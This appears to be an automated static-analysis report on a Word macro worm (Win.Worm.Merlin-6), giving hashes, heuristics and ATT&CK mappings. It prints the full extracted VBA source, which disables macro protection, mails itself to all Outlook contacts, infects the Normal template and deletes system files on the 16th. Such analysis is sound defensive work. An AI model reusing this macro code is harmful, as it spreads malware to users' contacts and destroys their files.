Win.Worm.Merlin-6 — Office (OLE) malware analysis

Static analysis result for SHA-256 b8ecd3b1e134bb0d…

MALICIOUS

Office (OLE)

Size: 40.5 KB
Created: 2001-07-12 17:51:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 71c0c1d50b4b30e09e4877e5a554aa71
SHA-1: b85ef3ee722018946ede4ca6acc19ed9c39f49a6
SHA-256: b8ecd3b1e134bb0da2adda752d84a3ecce4afa3f0bb15ad359093dd408694da8
Risk Score: 260

Malware Insights

Win.Worm.Merlin-6 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros that execute upon opening, disabling security features and attempting to send itself as an email attachment to contacts via Outlook. The macro also attempts to modify the system registry to avoid re-execution prompts. The presence of VBA macros and the behavior of disabling security settings strongly suggest a worm-like functionality, consistent with the ClamAV detection of Win.Worm.Merlin-6.

Heuristics (5)

  • ClamAV: Win.Worm.Merlin-6 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Worm.Merlin-6
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3575 bytes
SHA-256: dbd7b38e3cc203ba06d19f32af2e25ffcc78b1cb1bfaec956b69fd86563a7f4e
Detection: ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'VBS.Eva@mm
Private Sub Document_Open()
On Error Resume Next

 CommandBars("Macro").Controls("Security...").Enabled = False
 Options.VirusProtection = False
 Options.SaveNormalPrompt = False
 Options.ConfirmConversions = False
 Options.SavePropertiesPrompt = False

 Dim Address, NumOfContacts, Counter, EmailItem, ContactNumber
 Dim Outlook: Set Outlook = CreateObject("Outlook.Application")
  If Outlook = "Outlook" Then
   If System.PrivateProfileString("", "HKCU\Software\Eva\Macro", "") <> "oui" Then
    Dim Mapi: Set Mapi = Outlook.GetNameSpace("MAPI")
    Dim MapiAdList: Set MapiAdList = Mapi.AddressLists
     For Each Address In MapiAdList
      If Not Address.AddressEntries.Count = 0 Then
       NumOfContacts = Address.AddressEntries.Count
        For Counter = 1 To NumOfContacts
         Set ContactNumber = Address.AddressEntries(Counter)
         Set EmailItem = Outlook.CreateItem(0)
             EmailItem.To = ContactNumber.Address
             EmailItem.Subject = "Some News"
             EmailItem.Body = "I´ve got some news for you!"
             EmailItem.Attachments.Add ActiveDocument.FullName
             EmailItem.DeleteAfterSubmit = True
             EmailItem.Importance = ImportanceHigh
             EmailItem.Send
        Next
        System.PrivateProfileString("", "HKCU\Software\Eva\", "Macro") = "oui"
       End If
      Next

Dim ADocument: Set ADocument = ActiveDocument.VBProject.VBComponents.Item(1)
Dim NTemplate: Set NTemplate = NormalTemplate.VBProject.VBComponents.Item(1)
    NTemplateLines = NTemplate.CodeModule.CountOfLines
    ADocumentLines = ADocument.CodeModule.CountOfLines
    Counter = 2

 If ADocument.Name <> "'VBS.Eva@mm" Then
  If ADocumentLines > 0 Then
   ADocument.CodeModule.DeleteLines 1, ADocumentLines
   Set InfectFile = ADocument
   ADocument.Name = "'VBS.Eva@mm"
   DoADocument = True
 End If

 If NTemplate.Name <> "'VBS.Eva@mm" Then
  If NTemplateLines > 0 Then
   NTemplate.CodeModule.DeleteLines 1, NTemplateLines
   Set InfectFile = NTemplate
   NTemplate.Name = "'VBS.Eva@mm"
   DoNTemplate = True
 End If

 If DoNTemplate = True Then
  Do While ADocument.CodeModule.Lines(1, 1) = ""
   ADocument.CodeModule.DeleteLines 1
  Loop

  InfectFile.CodeModule.AddFromString ("Private Sub Document_Close()")

  Do While ADocument.CodeModule.Lines(BGN, 1) <> ""
   NTemplate.CodeModule.InsertLines BGN, ADocument.CodeModule.Lines(BGN, 1)
   Counter = Counter + 1
  Loop
 End If

 If DoADocument = True Then
  Do While NTemplate.CodeModule.Lines(1, 1) = ""
   NTemplate.CodeModule.DeleteLines 1
  Loop

  InfectFile.CodeModule.AddFromString ("Private Sub Document_Open()")

  Do While NTemplate.CodeModule.Lines(BGN, 1) <> ""
   ToInfect.CodeModule.InsertLines BGN, NTemplate.CodeModule.Lines(BGN, 1)
   Counter = Counter + 1
  Loop
 End If

 If Day(Now) = 16 Then
  fso.DeleteFile ("C:\command.com")
  fso.DeleteFile ("C:\win.com")
  MsgBox "That´s it!"
 End If

 If NTemplateLines <> 0 And ADocumentLines = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
  ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
 ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
  ActiveDocument.Saved = True
 End If
End Sub